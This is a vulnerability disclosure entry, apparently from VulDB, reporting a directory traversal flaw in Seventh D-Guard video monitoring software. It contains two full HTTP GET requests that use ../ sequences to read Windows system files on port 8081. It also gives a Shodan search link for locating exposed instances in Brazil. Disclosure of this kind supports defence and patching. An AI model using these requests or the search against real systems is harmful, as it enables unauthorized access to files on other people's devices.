| 标题 | Seventh D-Guard NA Path Traversal |
|---|
| 描述 | URL Vendor: https://www.seventh.com.br/
Product:
https://www.seventh.com.br/solucoes/projetos-de-monitoramento/videomonitoramento
https://www.seventh.com.br/suporte/dispositivos-integrados/dguard
Directory Traversal is a vulnerability which allows attackers to access restricted directories and read files outside of the web server's root directory.
GET /../../../../../../../../windows/win.ini HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Readind /etc/hosts
GET /../../../../../../../../Windows/System32/Drivers/Etc/hosts HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Shodan Query:
https://www.shodan.io/search?query=Title%3A%22Web%22+Content-Length%3A+21928+country%3A%22BR%22+Content-Type%3A+text%2Fhtml%3B+charset%3DISO-8859-1&page=3
|
|---|
| 用户 | c4ng4c3ir0 (UID 38456) |
|---|
| 提交 | 2025-02-06 18時29分 (1 年前) |
|---|
| 管理 | 2025-02-15 16時31分 (9 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 295965 [Seventh D-Guard 直到 20250206 HTTP GET Request 目录遍历] |
|---|
| 积分 | 17 |
|---|